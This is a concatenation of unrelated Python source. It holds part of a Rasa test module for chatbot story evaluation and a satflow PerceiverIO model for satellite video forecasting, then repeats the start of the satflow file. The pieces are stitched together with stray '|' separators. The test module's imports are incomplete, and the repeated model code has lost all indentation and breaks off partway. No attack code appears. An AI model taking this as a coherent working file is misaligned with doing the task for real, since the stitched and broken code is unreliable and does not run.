# noinspection PyUnresolvedReferences
from rasa.nlu.test import evaluate_entities, run_evaluation
from rasa.core.agent import Agent
from tests.core.conftest import (
DEFAULT_STORIES_FILE,
E2E_STORY_FILE_UNKNOWN_ENTITY,
END_TO_END_STORY_FILE,
E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER,
STORY_FILE_TRIPS_CIRCUIT_BREAKER,
)
async def test_evaluation_file_creation(tmpdir: Path, default_agent: Agent):
    """Story evaluation should write failure, success, report and confusion-matrix files."""
    failed_stories_path = str(tmpdir / FAILED_STORIES_FILE)
    success_stories_path = str(tmpdir / SUCCESSFUL_STORIES_FILE)
    report_path = str(tmpdir / REPORT_STORIES_FILE)
    confusion_matrix_path = str(tmpdir / CONFUSION_MATRIX_STORIES_FILE)
    # errors=True and successes=True opt into writing the per-story files.
    await evaluate_stories(
        stories=DEFAULT_STORIES_FILE,
        agent=default_agent,
        out_directory=str(tmpdir),
        max_stories=None,
        e2e=False,
        errors=True,
        successes=True,
    )
    assert os.path.isfile(failed_stories_path)
    assert os.path.isfile(success_stories_path)
    assert os.path.isfile(report_path)
    assert os.path.isfile(confusion_matrix_path)
async def test_end_to_end_evaluation_script(default_agent: Agent):
    """E2E evaluation on matching stories yields no mismatches or failed stories."""
    generator = await _create_data_generator(
        END_TO_END_STORY_FILE, default_agent, use_e2e=True
    )
    completed_trackers = generator.generate_story_trackers()
    story_evaluation, num_stories, _ = await _collect_story_predictions(
        completed_trackers, default_agent, use_e2e=True
    )
    # Expected flattened evaluation store: actions, then intents, then the
    # serialised entity (order as produced by serialise()).
    serialised_store = [
        "utter_greet",
        "action_listen",
        "utter_greet",
        "action_listen",
        "utter_default",
        "action_listen",
        "utter_goodbye",
        "action_listen",
        "utter_greet",
        "action_listen",
        "utter_default",
        "action_listen",
        "greet",
        "greet",
        "default",
        "goodbye",
        "greet",
        "default",
        '[{"name": "Max"}]{"entity": "name", "value": "Max"}',
    ]
    assert story_evaluation.evaluation_store.serialise()[0] == serialised_store
    assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
    assert len(story_evaluation.failed_stories) == 0
    assert num_stories == 3
async def test_end_to_end_evaluation_script_unknown_entity(default_agent: Agent):
    """A story containing an entity unknown to the agent must be reported as failed."""
    generator = await _create_data_generator(
        E2E_STORY_FILE_UNKNOWN_ENTITY, default_agent, use_e2e=True
    )
    completed_trackers = generator.generate_story_trackers()
    story_evaluation, num_stories, _ = await _collect_story_predictions(
        completed_trackers, default_agent, use_e2e=True
    )
    assert story_evaluation.evaluation_store.has_prediction_target_mismatch()
    assert len(story_evaluation.failed_stories) == 1
    assert num_stories == 1
@pytest.mark.timeout(300)
async def test_end_to_evaluation_with_forms(form_bot_agent: Agent):
    """Form-based end-to-end stories evaluate without prediction mismatches."""
    generator = await _create_data_generator(
        "data/test_evaluations/form_end_to_end_stories.yml",
        form_bot_agent,
        use_e2e=True,
    )
    test_stories = generator.generate_story_trackers()
    story_evaluation, num_stories, _ = await _collect_story_predictions(
        test_stories, form_bot_agent, use_e2e=True
    )
    assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
async def test_source_in_failed_stories(tmpdir: Path, default_agent: Agent):
    """The failed-stories output names the source file of each failing story."""
    stories_path = str(tmpdir / FAILED_STORIES_FILE)
    await evaluate_stories(
        stories=E2E_STORY_FILE_UNKNOWN_ENTITY,
        agent=default_agent,
        out_directory=str(tmpdir),
        max_stories=None,
        e2e=False,
    )
    story_file_unknown_entity = Path(E2E_STORY_FILE_UNKNOWN_ENTITY).absolute()
    failed_stories = rasa.shared.utils.io.read_file(stories_path)
    # The story header must include the absolute path of the originating file.
    assert (
        f"story: simple_story_with_unknown_entity ({story_file_unknown_entity})"
        in failed_stories
    )
async def test_end_to_evaluation_trips_circuit_breaker():
    """Predictions report 'circuit breaker tripped' once the action limit is hit."""
    agent = Agent(
        domain="data/test_domains/default.yml",
        policies=[MemoizationPolicy(max_history=11)],
    )
    training_data = await agent.load_data(STORY_FILE_TRIPS_CIRCUIT_BREAKER)
    agent.train(training_data)
    generator = await _create_data_generator(
        E2E_STORY_FILE_TRIPS_CIRCUIT_BREAKER, agent, use_e2e=True
    )
    trackers = generator.generate_story_trackers()
    story_evaluation, num_stories, _ = await _collect_story_predictions(
        trackers, agent, use_e2e=True
    )
    # Ten greetings are predicted before the circuit breaker cuts the story off;
    # the remaining two predictions are replaced by the breaker marker.
    expected_predictions = ["utter_greet"] * 10 + ["circuit breaker tripped"] * 2
    assert story_evaluation.evaluation_store.action_predictions == expected_predictions
    assert num_stories == 1
@pytest.mark.parametrize(
    "text, entity, expected_entity",
    [
        # Duckling: the numeric value is converted to a string; extractor and
        # confidence fields are dropped.
        (
            "The first one please.",
            {
                "extractor": "DucklingEntityExtractor",
                "entity": "ordinal",
                "confidence": 0.87,
                "start": 4,
                "end": 9,
                "value": 1,
            },
            {
                "text": "The first one please.",
                "entity": "ordinal",
                "start": 4,
                "end": 9,
                "value": "1",
            },
        ),
        # CRF: value already a string; only metadata fields are dropped.
        (
            "The first one please.",
            {
                "extractor": "CRFEntityExtractor",
                "entity": "ordinal",
                "confidence": 0.87,
                "start": 4,
                "end": 9,
                "value": "1",
            },
            {
                "text": "The first one please.",
                "entity": "ordinal",
                "start": 4,
                "end": 9,
                "value": "1",
            },
        ),
        # DIET: same cleaning behaviour for a different extractor.
        (
            "Italian food",
            {
                "extractor": "DIETClassifier",
                "entity": "cuisine",
                "confidence": 0.99,
                "start": 0,
                "end": 7,
                "value": "Italian",
            },
            {
                "text": "Italian food",
                "entity": "cuisine",
                "start": 0,
                "end": 7,
                "value": "Italian",
            },
        ),
    ],
)
def test_event_has_proper_implementation(
    text: Text, entity: Dict[Text, Any], expected_entity: Dict[Text, Any]
):
    """_clean_entity_results keeps text/entity/start/end/value and stringifies value."""
    actual_entities = _clean_entity_results(text, [entity])
    assert actual_entities[0] == expected_entity
@pytest.mark.timeout(600)
@pytest.mark.parametrize(
    "test_file",
    [
        ("data/test_yaml_stories/test_full_retrieval_intent_story.yml"),
        ("data/test_yaml_stories/test_base_retrieval_intent_story.yml"),
    ],
)
async def test_retrieval_intent(response_selector_agent: Agent, test_file: Text):
    """Stories may reference either the base or the full retrieval intent."""
    generator = await _create_data_generator(
        test_file, response_selector_agent, use_e2e=True,
    )
    test_stories = generator.generate_story_trackers()
    story_evaluation, num_stories, _ = await _collect_story_predictions(
        test_stories, response_selector_agent, use_e2e=True
    )
    # check that test story can either specify base intent or full retrieval intent
    assert not story_evaluation.evaluation_store.has_prediction_target_mismatch()
@pytest.mark.parametrize(
    "test_file",
    [
        ("data/test_yaml_stories/test_full_retrieval_intent_wrong_prediction.yml"),
        ("data/test_yaml_stories/test_base_retrieval_intent_wrong_prediction.yml"),
    ],
)
async def test_retrieval_intent_wrong_prediction(
    tmpdir: Path, response_selector_agent: Agent, test_file: Text
):
    """Failed stories show the full retrieval intent in the predicted entry."""
    stories_path = str(tmpdir / FAILED_STORIES_FILE)
    await evaluate_stories(
        stories=test_file,
        agent=response_selector_agent,
        out_directory=str(tmpdir),
        max_stories=None,
        e2e=True,
    )
    failed_stories = rasa.shared.utils.io.read_file(stories_path)
    # check if the predicted entry contains full retrieval intent
    assert "# predicted: chitchat/ask_name" in failed_stories
@pytest.mark.timeout(240)
async def test_e2e_with_entity_evaluation(e2e_bot_agent: Agent, tmp_path: Path):
    """E2E evaluation writes per-entity TEDPolicy scores and an errors file."""
    test_file = "data/test_e2ebot/tests/test_stories.yml"
    await evaluate_stories(
        stories=test_file,
        agent=e2e_bot_agent,
        out_directory=str(tmp_path),
        max_stories=None,
        e2e=True,
    )
    report = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_report.json")
    # Scores are keyed by entity name ("name", "mood") in the report file.
    assert report["name"] == {
        "precision": 1.0,
        "recall": 1.0,
        "f1-score": 1.0,
        "support": 1,
        "confused_with": {},
    }
    assert report["mood"] == {
        "precision": 1.0,
        "recall": 0.5,
        "f1-score": 0.6666666666666666,
        "support": 2,
        "confused_with": {},
    }
    errors = rasa.shared.utils.io.read_json_file(tmp_path / "TEDPolicy_errors.json")
    assert len(errors) == 1
    assert errors[0]["text"] == "today I was very cranky"
@pytest.mark.parametrize(
    "stories_yaml,expected_results",
    [
        [
            """
            stories:
            - story: story1
              steps:
              - intent: greet
              - action: utter_greet
            - story: story2
              steps:
              - intent: goodbye
              - action: utter_goodbye
            - story: story3
              steps:
              - intent: greet
              - action: utter_greet
              - intent: goodbye
              - action: utter_default
            """,
            # Expected per-action scores: utter_default's single target (in
            # story3) is never predicted (recall 0), so only 2 of 3
            # conversations are fully correct.
            {
                "utter_goodbye": {
                    "precision": 1.0,
                    "recall": 1.0,
                    "f1-score": 1.0,
                    "support": 1,
                },
                "action_listen": {
                    "precision": 1.0,
                    "recall": 0.75,
                    "f1-score": 0.8571428571428571,
                    "support": 4,
                },
                "utter_greet": {
                    "precision": 1.0,
                    "recall": 1.0,
                    "f1-score": 1.0,
                    "support": 2,
                },
                "utter_default": {
                    "precision": 0.0,
                    "recall": 0.0,
                    "f1-score": 0.0,
                    "support": 1,
                },
                "micro avg": {
                    "precision": 1.0,
                    "recall": 0.75,
                    "f1-score": 0.8571428571428571,
                    "support": 8,
                },
                "macro avg": {
                    "precision": 0.75,
                    "recall": 0.6875,
                    "f1-score": 0.7142857142857143,
                    "support": 8,
                },
                "weighted avg": {
                    "precision": 0.875,
                    "recall": 0.75,
                    "f1-score": 0.8035714285714286,
                    "support": 8,
                },
                "conversation_accuracy": {
                    "accuracy": 2.0 / 3.0,
                    "total": 3,
                    "correct": 2,
                },
            },
        ],
    ],
)
async def test_story_report(
    tmpdir: Path,
    core_agent: Agent,
    stories_yaml: Text,
    expected_results: Dict[Text, Dict[Text, Any]],
) -> None:
    """Check story_report.json file contains correct result keys/values."""
    stories_path = tmpdir / "stories.yml"
    stories_path.write_text(stories_yaml, "utf8")
    out_directory = tmpdir / "results"
    out_directory.mkdir()
    await evaluate_stories(stories_path, core_agent, out_directory=out_directory)
    story_report_path = out_directory / "story_report.json"
    assert story_report_path.exists()
    actual_results = json.loads(story_report_path.read_text("utf8"))
    assert actual_results == expected_results
async def test_story_report_with_empty_stories(
    tmpdir: Path, core_agent: Agent,
) -> None:
    """Evaluating an empty stories file still writes a report, containing {}."""
    stories_file = tmpdir / "stories.yml"
    stories_file.write_text("", "utf8")
    results_directory = tmpdir / "results"
    results_directory.mkdir()
    await evaluate_stories(stories_file, core_agent, out_directory=results_directory)
    report_path = results_directory / "story_report.json"
    assert report_path.exists()
    report_content = json.loads(report_path.read_text("utf8"))
    assert report_content == {}
@pytest.mark.parametrize(
    "skip_field,skip_value",
    [
        (None, None),
        ("precision", None),
        ("f1", None),
        ("in_training_data_fraction", None),
        ("report", None),
        ("include_report", False),
    ],
)
def test_log_evaluation_table(caplog, skip_field, skip_value):
    """Check that _log_evaluation_table correctly omits/includes optional args."""
    arr = [1, 1, 1, 0]
    acc = 0.75
    kwargs = {
        "precision": 0.5,
        "f1": 0.6,
        "in_training_data_fraction": 0.1,
        "report": {"macro f1": 0.7},
    }
    if skip_field:
        kwargs[skip_field] = skip_value
    caplog.set_level(logging.INFO)
    rasa.core.test._log_evaluation_table(arr, "CONVERSATION", acc, **kwargs)
    # These two lines are always logged, regardless of the optional args.
    assert f"Correct: {int(len(arr) * acc)} / {len(arr)}" in caplog.text
    assert f"Accuracy: {acc:.3f}" in caplog.text
    # Each optional field is logged unless explicitly skipped.
    if skip_field == "f1":
        assert "F1-Score:" not in caplog.text
    else:
        assert f"F1-Score: {kwargs['f1']:5.3f}" in caplog.text
    if skip_field == "precision":
        assert "Precision:" not in caplog.text
    else:
        assert f"Precision: {kwargs['precision']:5.3f}" in caplog.text
    if skip_field == "in_training_data_fraction":
        assert "In-data fraction:" not in caplog.text
    else:
        assert (
            f"In-data fraction: {kwargs['in_training_data_fraction']:.3g}"
            in caplog.text
        )
    if skip_field in ("report", "include_report"):
        assert "Classification report:" not in caplog.text
    else:
        assert f"Classification report: \n{kwargs['report']}" in caplog.text
|
from perceiver_pytorch import PerceiverIO, MultiPerceiver
from perceiver_pytorch.modalities import InputModality, modality_encoding
from perceiver_pytorch.utils import encode_position
from perceiver_pytorch.encoders import ImageEncoder
from perceiver_pytorch.decoders import ImageDecoder
import torch
from math import prod
from torch.distributions import uniform
from typing import Iterable, Dict, Optional, Any, Union, Tuple
from satflow.models.base import register_model, BaseModel
from einops import rearrange, repeat
from pl_bolts.optimizers.lr_scheduler import LinearWarmupCosineAnnealingLR
from satflow.models.losses import get_loss
import torch_optimizer as optim
import logging
# Shared module logger; WARN by default so the per-step logger.debug(...)
# calls in the models stay silent unless explicitly enabled.
logger = logging.getLogger("satflow.model")
logger.setLevel(logging.WARN)
@register_model
class Perceiver(BaseModel):
    """PerceiverIO-based satellite video forecasting model.

    The input is split into a satellite-channel timeseries modality and a
    static base-map modality, plus a one-hot forecast-time modality; one
    output frame is decoded per forecast step.
    """

    def __init__(
        self,
        input_channels: int = 12,
        sat_channels: int = 12,
        forecast_steps: int = 48,
        input_size: int = 64,
        lr: float = 5e-4,
        visualize: bool = True,
        max_frequency: float = 4.0,
        depth: int = 6,
        num_latents: int = 256,
        cross_heads: int = 1,
        latent_heads: int = 8,
        cross_dim_heads: int = 8,
        latent_dim: int = 512,
        weight_tie_layers: bool = False,
        decoder_ff: bool = True,
        dim: int = 32,
        logits_dim: int = 100,
        queries_dim: int = 32,
        latent_dim_heads: int = 64,
        loss="mse",
        sin_only: bool = False,
        encode_fourier: bool = True,
        preprocessor_type: Optional[str] = None,
        postprocessor_type: Optional[str] = None,
        encoder_kwargs: Optional[Dict[str, Any]] = None,
        decoder_kwargs: Optional[Dict[str, Any]] = None,
        pretrained: bool = False,
    ):
        # NOTE(review): super(BaseModel, self) skips BaseModel.__init__ in the
        # MRO and initialises BaseModel's parent directly — confirm intended.
        super(BaseModel, self).__init__()
        self.forecast_steps = forecast_steps
        self.input_channels = input_channels
        self.lr = lr
        self.pretrained = pretrained
        self.visualize = visualize
        self.sat_channels = sat_channels
        self.output_channels = sat_channels
        self.criterion = get_loss(loss)
        # Warn if using frequency is smaller than Nyquist Frequency
        if max_frequency < input_size / 2:
            print(
                f"Max frequency is less than Nyquist frequency, currently set to {max_frequency} while "
                f"the Nyquist frequency for input of size {input_size} is {input_size / 2}"
            )
        # Preprocessor, if desired, on top of the other processing done
        if preprocessor_type is not None:
            if preprocessor_type not in ("conv", "patches", "pixels", "conv1x1", "metnet"):
                raise ValueError("Invalid prep_type!")
            if preprocessor_type == "metnet":
                # MetNet processing
                self.preprocessor = ImageEncoder(
                    crop_size=input_size,
                    preprocessor_type="metnet",
                )
                video_input_channels = (
                    8 * sat_channels
                )  # This is only done on the sat channel inputs
                # If doing it on the base map, then need
                image_input_channels = 4 * (input_channels - sat_channels)
            else:
                self.preprocessor = ImageEncoder(
                    input_channels=sat_channels,
                    preprocessor_type=preprocessor_type,
                    **encoder_kwargs,
                )
                video_input_channels = self.preprocessor.output_channels
                image_input_channels = self.preprocessor.output_channels
        else:
            self.preprocessor = None
            video_input_channels = sat_channels
            image_input_channels = input_channels - sat_channels
        # The preprocessor will change the number of channels in the input
        # Timeseries input
        video_modality = InputModality(
            name="timeseries",
            input_channels=video_input_channels,
            input_axis=3,  # number of axes, 3 for video
            num_freq_bands=input_size,  # number of freq bands, with original value (2 * K + 1)
            max_freq=max_frequency,  # maximum frequency, hyperparameter depending on how fine the data is, should be Nyquist frequency (i.e. 112 for 224 input image)
            sin_only=sin_only,  # Whether if sine only for Fourier encoding, TODO test more
            fourier_encode=encode_fourier,  # Whether to encode position with Fourier features
        )
        # Use image modality for latlon, elevation, other base data?
        image_modality = InputModality(
            name="base",
            input_channels=image_input_channels,
            input_axis=2,  # number of axes, 2 for images
            num_freq_bands=input_size,  # number of freq bands, with original value (2 * K + 1)
            max_freq=max_frequency,  # maximum frequency, hyperparameter depending on how fine the data is
            sin_only=sin_only,
            fourier_encode=encode_fourier,
        )
        # Sort audio for timestep one-hot encode? Or include under other modality?
        timestep_modality = InputModality(
            name="forecast_time",
            input_channels=1,  # number of channels for mono audio
            input_axis=1,  # number of axes, 2 for images
            num_freq_bands=self.forecast_steps,  # number of freq bands, with original value (2 * K + 1)
            max_freq=max_frequency,  # maximum frequency, hyperparameter depending on how fine the data is
            sin_only=sin_only,
            fourier_encode=encode_fourier,
        )
        self.model = MultiPerceiver(
            modalities=[video_modality, image_modality, timestep_modality],
            dim=dim,  # dimension of sequence to be encoded
            queries_dim=queries_dim,  # dimension of decoder queries
            logits_dim=logits_dim,  # dimension of final logits
            depth=depth,  # depth of net
            num_latents=num_latents,  # number of latents, or induced set points, or centroids. different papers giving it different names
            latent_dim=latent_dim,  # latent dimension
            cross_heads=cross_heads,  # number of heads for cross attention. paper said 1
            latent_heads=latent_heads,  # number of heads for latent self attention, 8
            cross_dim_head=cross_dim_heads,  # number of dimensions per cross attention head
            latent_dim_head=latent_dim_heads,  # number of dimensions per latent self attention head
            weight_tie_layers=weight_tie_layers,  # whether to weight tie layers (optional, as indicated in the diagram)
            # self_per_cross_attn=self_per_cross_attention, # number of self attention blocks per cross attention
            sine_only=sin_only,
            fourier_encode_data=encode_fourier,
            output_shape=input_size,  # Shape of output to make the correct sized logits dim, needed so reshaping works
            decoder_ff=decoder_ff,  # Optional decoder FF
        )
        if postprocessor_type is not None:
            if postprocessor_type not in ("conv", "patches", "pixels", "conv1x1"):
                raise ValueError("Invalid postprocessor_type!")
            self.postprocessor = ImageDecoder(
                postprocess_type=postprocessor_type, output_channels=sat_channels, **decoder_kwargs
            )
        else:
            self.postprocessor = None

    def encode_inputs(self, x: torch.Tensor) -> Dict[str, torch.Tensor]:
        """Split the input into the timeseries and base-map modalities (channel-last)."""
        video_inputs = x[:, :, : self.sat_channels, :, :]
        base_inputs = x[
            :, 0, self.sat_channels :, :, :
        ]  # Base maps should be the same for all timesteps in a sample
        # Run the preprocessors here when encoding the inputs
        if self.preprocessor is not None:
            # Expects Channel first
            video_inputs = self.preprocessor(video_inputs)
            base_inputs = self.preprocessor(base_inputs)
        video_inputs = video_inputs.permute(0, 1, 3, 4, 2)  # Channel last
        base_inputs = base_inputs.permute(0, 2, 3, 1)  # Channel last
        logger.debug(f"Timeseries: {video_inputs.size()} Base: {base_inputs.size()}")
        return {"timeseries": video_inputs, "base": base_inputs}

    def add_timestep(self, batch_size: int, timestep: int = 1) -> torch.Tensor:
        """Build a one-hot forecast-time tensor for `timestep`, repeated over the batch."""
        times = (torch.eye(self.forecast_steps)[timestep]).unsqueeze(-1).unsqueeze(-1)
        ones = torch.ones(1, 1, 1)
        timestep_input = times * ones
        timestep_input = timestep_input.squeeze(-1)
        timestep_input = repeat(timestep_input, "... -> b ...", b=batch_size)
        logger.debug(f"Forecast Step: {timestep_input.size()}")
        return timestep_input

    def _train_or_validate_step(self, batch, batch_idx, is_training: bool = True):
        """Shared train/val step: autoregressively predict all forecast steps and log losses."""
        x, y = batch
        batch_size = y.size(0)
        # Compute the logging prefix once. Reusing double quotes inside a
        # double-quoted f-string is a SyntaxError before Python 3.12 (PEP 701).
        step_name = "train" if is_training else "val"
        # For each future timestep:
        predictions = []
        query = self.construct_query(x)
        if self.visualize:
            vis_x = x.cpu()
        x = self.encode_inputs(x)
        for i in range(self.forecast_steps):
            x["forecast_time"] = self.add_timestep(batch_size, i).type_as(y)
            # x_i = self.ct(x["timeseries"], fstep=i)
            y_hat = self(x, query=query)
            y_hat = rearrange(y_hat, "b h (w c) -> b c h w", c=self.output_channels)
            predictions.append(y_hat)
        y_hat = torch.stack(predictions, dim=1)  # Stack along the timestep dimension
        if self.postprocessor is not None:
            y_hat = self.postprocessor(y_hat)
        if self.visualize:
            # Only visualize the second batch of train/val
            if batch_idx == 1:
                self.visualize_step(vis_x, y, y_hat, batch_idx, step=step_name)
        loss = self.criterion(y, y_hat)
        self.log_dict({f"{step_name}/loss": loss})
        frame_loss_dict = {}
        for f in range(self.forecast_steps):
            frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
            frame_loss_dict[f"{step_name}/frame_{f}_loss"] = frame_loss
        self.log_dict(frame_loss_dict)
        return loss

    def configure_optimizers(self):
        """LAMB optimizer with per-step linear-warmup cosine annealing."""
        # They use LAMB as the optimizer
        optimizer = optim.Lamb(self.parameters(), lr=self.lr, betas=(0.9, 0.999))
        scheduler = LinearWarmupCosineAnnealingLR(optimizer, warmup_epochs=10, max_epochs=100)
        lr_dict = {
            # REQUIRED: The scheduler instance
            "scheduler": scheduler,
            # The unit of the scheduler's step size, could also be 'step'.
            # 'epoch' updates the scheduler on epoch end whereas 'step'
            # updates it after a optimizer update.
            "interval": "step",
            # How many epochs/steps should pass between calls to
            # `scheduler.step()`. 1 corresponds to updating the learning
            # rate after every epoch/step.
            "frequency": 1,
            # If using the `LearningRateMonitor` callback to monitor the
            # learning rate progress, this keyword can be used to specify
            # a custom logged name
            "name": None,
        }
        return {"optimizer": optimizer, "lr_scheduler": lr_dict}

    def construct_query(self, x):
        """Build the decoder query from the last timestep's first sat channel."""
        # key, value: B x N x K; query: B x M x K
        # Attention maps -> B x N x M
        # Output -> B x M x K
        # So want query to be B X (T*H*W) X C to reshape to B x T x C x H x W
        if self.preprocessor is not None:
            x = self.preprocessor(x)
        y_query = x[:, -1, 0, :, :]  # Only want sat channels, the output
        # y_query = torch.permute(y_query, (0, 2, 3, 1)) # Channel Last
        # Need to reshape to 3 dimensions, TxHxW or HxWxC
        # y_query = rearrange(y_query, "b h w d -> b (h w) d")
        logger.debug(f"Query Shape: {y_query.shape}")
        return y_query

    def forward(self, x, mask=None, query=None):
        """Delegate to the wrapped MultiPerceiver."""
        return self.model.forward(x, mask=mask, queries=query)
class MultiPerceiverSat(torch.nn.Module):
    def __init__(
        self,
        use_input_as_query: bool = False,
        use_learnable_query: bool = False,
        **kwargs,
    ):
        """
        PerceiverIO made to work more specifically with timeseries images
        Not a recurrent model, so like MetNet somewhat, can optionally give a one-hot encoded vector for the future
        timestep
        Args:
            use_input_as_query: Whether to use the input itself as the decoder query (currently only stored)
            use_learnable_query: Whether to learn the decoder query from sampled noise
            **kwargs: Forwarded to MultiPerceiver; `query_dim` and `output_shape` are also read here
        """
        super(MultiPerceiverSat, self).__init__()
        self.multi_perceiver = MultiPerceiver(**kwargs)
        # Store the flags: forward() reads self.use_learnable_query, which the
        # previous version never assigned (AttributeError on every call).
        self.use_input_as_query = use_input_as_query
        self.use_learnable_query = use_learnable_query
        # Read the query configuration *before* building the learnable query;
        # previously self.query_dim was used before it was assigned.
        self.query_dim = kwargs.get("query_dim", 32)
        self.query_future_size = prod(kwargs.get("output_shape", [24, 32, 32]))
        if use_learnable_query:
            self.learnable_query = torch.nn.Linear(self.query_dim, self.query_dim)
            self.distribution = uniform.Uniform(low=torch.Tensor([0.0]), high=torch.Tensor([1.0]))
        # Like GAN sorta, random input, learn important parts in linear layer T*H*W shape,
        # need to add Fourier features too though

    def forward(self, multi_modality_data: Dict[str, torch.Tensor], mask=None, queries=None):
        """Encode all modalities, optionally replace queries with a learned one, and decode."""
        data = self.multi_perceiver.forward(multi_modality_data)
        # Create learnable query here, need to add fourier features as well
        if self.use_learnable_query:
            # Create learnable query, also adds somewhat ensemble on multiple forward passes
            # Middle is the shape of the future timesteps and such
            z = self.distribution.sample(
                (data.shape[0], self.query_future_size, self.query_dim)
            ).type_as(data)
            queries = self.learnable_query(z)
        # Add Fourier Features now to the query
        perceiver_output = self.multi_perceiver.perceiver.forward(data, mask, queries)
        logger.debug(f"Perceiver Finished Output: {perceiver_output.size()}")
        return perceiver_output
| from perceiver_pytorch import PerceiverIO, MultiPerceiver
from perceiver_pytorch.modalities import InputModality, modality_encoding
from perceiver_pytorch.utils import encode_position
from perceiver_pytorch.encoders import ImageEncoder
from perceiver_pytorch.decoders import ImageDecoder
import torch
from math import prod
from torch.distributions import uniform
from typing import Iterable, Dict, Optional, Any, Union, Tuple
from satflow.models.base import register_model, BaseModel
from einops import rearrange, repeat
from pl_bolts.optimizers.lr_scheduler import LinearWarmupCosineAnnealingLR
from satflow.models.losses import get_loss
import torch_optimizer as optim
import logging
# Shared module logger; WARN by default so the per-step logger.debug(...)
# calls in the models stay silent unless explicitly enabled.
logger = logging.getLogger("satflow.model")
logger.setLevel(logging.WARN)
@register_model
class Perceiver(BaseModel):
def __init__(
self,
input_channels: int = 12,
sat_channels: int = 12,
forecast_steps: int = 48,
input_size: int = 64,
lr: float = 5e-4,
visualize: bool = True,
max_frequency: float = 4.0,
depth: int = 6,
num_latents: int = 256,
cross_heads: int = 1,
latent_heads: int = 8,
cross_dim_heads: int = 8,
latent_dim: int = 512,
weight_tie_layers: bool = False,
decoder_ff: bool = True,
dim: int = 32,
logits_dim: int = 100,
queries_dim: int = 32,
latent_dim_heads: int = 64,
loss="mse",
sin_only: bool = False,
encode_fourier: bool = True,
preprocessor_type: Optional[str] = None,
postprocessor_type: Optional[str] = None,
encoder_kwargs: Optional[Dict[str, Any]] = None,
decoder_kwargs: Optional[Dict[str, Any]] = None,
pretrained: bool = False,
):
super(BaseModel, self).__init__()
self.forecast_steps = forecast_steps
self.input_channels = input_channels
self.lr = lr
self.pretrained = pretrained
self.visualize = visualize
self.sat_channels = sat_channels
self.output_channels = sat_channels
self.criterion = get_loss(loss)
# Warn if using frequency is smaller than Nyquist Frequency
if max_frequency < input_size / 2:
print(
f"Max frequency is less than Nyquist frequency, currently set to {max_frequency} while "
f"the Nyquist frequency for input of size {input_size} is {input_size / 2}"
)
# Preprocessor, if desired, on top of the other processing done
if preprocessor_type is not None:
if preprocessor_type not in ("conv", "patches", "pixels", "conv1x1", "metnet"):
raise ValueError("Invalid prep_type!")
if preprocessor_type == "metnet":
# MetNet processing
self.preprocessor = ImageEncoder(
crop_size=input_size,
preprocessor_type="metnet",
)
video_input_channels = (
8 * sat_channels
) # This is only done on the sat channel inputs
# If doing it on the base map, then need
image_input_channels = 4 * (input_channels - sat_channels)
else:
self.preprocessor = ImageEncoder(
input_channels=sat_channels,
preprocessor_type=preprocessor_type,
**encoder_kwargs,
)
video_input_channels = self.preprocessor.output_channels
image_input_channels = self.preprocessor.output_channels
else:
self.preprocessor = None
video_input_channels = sat_channels
image_input_channels = input_channels - sat_channels
# The preprocessor will change the number of channels in the input
# Timeseries input
video_modality = InputModality(
name="timeseries",
input_channels=video_input_channels,
input_axis=3, # number of axes, 3 for video
num_freq_bands=input_size, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is, should be Nyquist frequency (i.e. 112 for 224 input image)
sin_only=sin_only, # Whether if sine only for Fourier encoding, TODO test more
fourier_encode=encode_fourier, # Whether to encode position with Fourier features
)
# Use image modality for latlon, elevation, other base data?
image_modality = InputModality(
name="base",
input_channels=image_input_channels,
input_axis=2, # number of axes, 2 for images
num_freq_bands=input_size, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is
sin_only=sin_only,
fourier_encode=encode_fourier,
)
# Sort audio for timestep one-hot encode? Or include under other modality?
timestep_modality = InputModality(
name="forecast_time",
input_channels=1, # number of channels for mono audio
input_axis=1, # number of axes, 2 for images
num_freq_bands=self.forecast_steps, # number of freq bands, with original value (2 * K + 1)
max_freq=max_frequency, # maximum frequency, hyperparameter depending on how fine the data is
sin_only=sin_only,
fourier_encode=encode_fourier,
)
self.model = MultiPerceiver(
modalities=[video_modality, image_modality, timestep_modality],
dim=dim, # dimension of sequence to be encoded
queries_dim=queries_dim, # dimension of decoder queries
logits_dim=logits_dim, # dimension of final logits
depth=depth, # depth of net
num_latents=num_latents, # number of latents, or induced set points, or centroids. different papers giving it different names
latent_dim=latent_dim, # latent dimension
cross_heads=cross_heads, # number of heads for cross attention. paper said 1
latent_heads=latent_heads, # number of heads for latent self attention, 8
cross_dim_head=cross_dim_heads, # number of dimensions per cross attention head
latent_dim_head=latent_dim_heads, # number of dimensions per latent self attention head
weight_tie_layers=weight_tie_layers, # whether to weight tie layers (optional, as indicated in the diagram)
# self_per_cross_attn=self_per_cross_attention, # number of self attention blocks per cross attention
sine_only=sin_only,
fourier_encode_data=encode_fourier,
output_shape=input_size, # Shape of output to make the correct sized logits dim, needed so reshaping works
decoder_ff=decoder_ff, # Optional decoder FF
)
if postprocessor_type is not None:
if postprocessor_type not in ("conv", "patches", "pixels", "conv1x1"):
raise ValueError("Invalid postprocessor_type!")
self.postprocessor = ImageDecoder(
postprocess_type=postprocessor_type, output_channels=sat_channels, **decoder_kwargs
)
else:
self.postprocessor = None
def encode_inputs(self, x: torch.Tensor) -> Dict[str, torch.Tensor]:
video_inputs = x[:, :, : self.sat_channels, :, :]
base_inputs = x[
:, 0, self.sat_channels :, :, :
] # Base maps should be the same for all timesteps in a sample
# Run the preprocessors here when encoding the inputs
if self.preprocessor is not None:
# Expects Channel first
video_inputs = self.preprocessor(video_inputs)
base_inputs = self.preprocessor(base_inputs)
video_inputs = video_inputs.permute(0, 1, 3, 4, 2) # Channel last
base_inputs = base_inputs.permute(0, 2, 3, 1) # Channel last
logger.debug(f"Timeseries: {video_inputs.size()} Base: {base_inputs.size()}")
return {"timeseries": video_inputs, "base": base_inputs}
def add_timestep(self, batch_size: int, timestep: int = 1) -> torch.Tensor:
times = (torch.eye(self.forecast_steps)[timestep]).unsqueeze(-1).unsqueeze(-1)
ones = torch.ones(1, 1, 1)
timestep_input = times * ones
timestep_input = timestep_input.squeeze(-1)
timestep_input = repeat(timestep_input, "... -> b ...", b=batch_size)
logger.debug(f"Forecast Step: {timestep_input.size()}")
return timestep_input
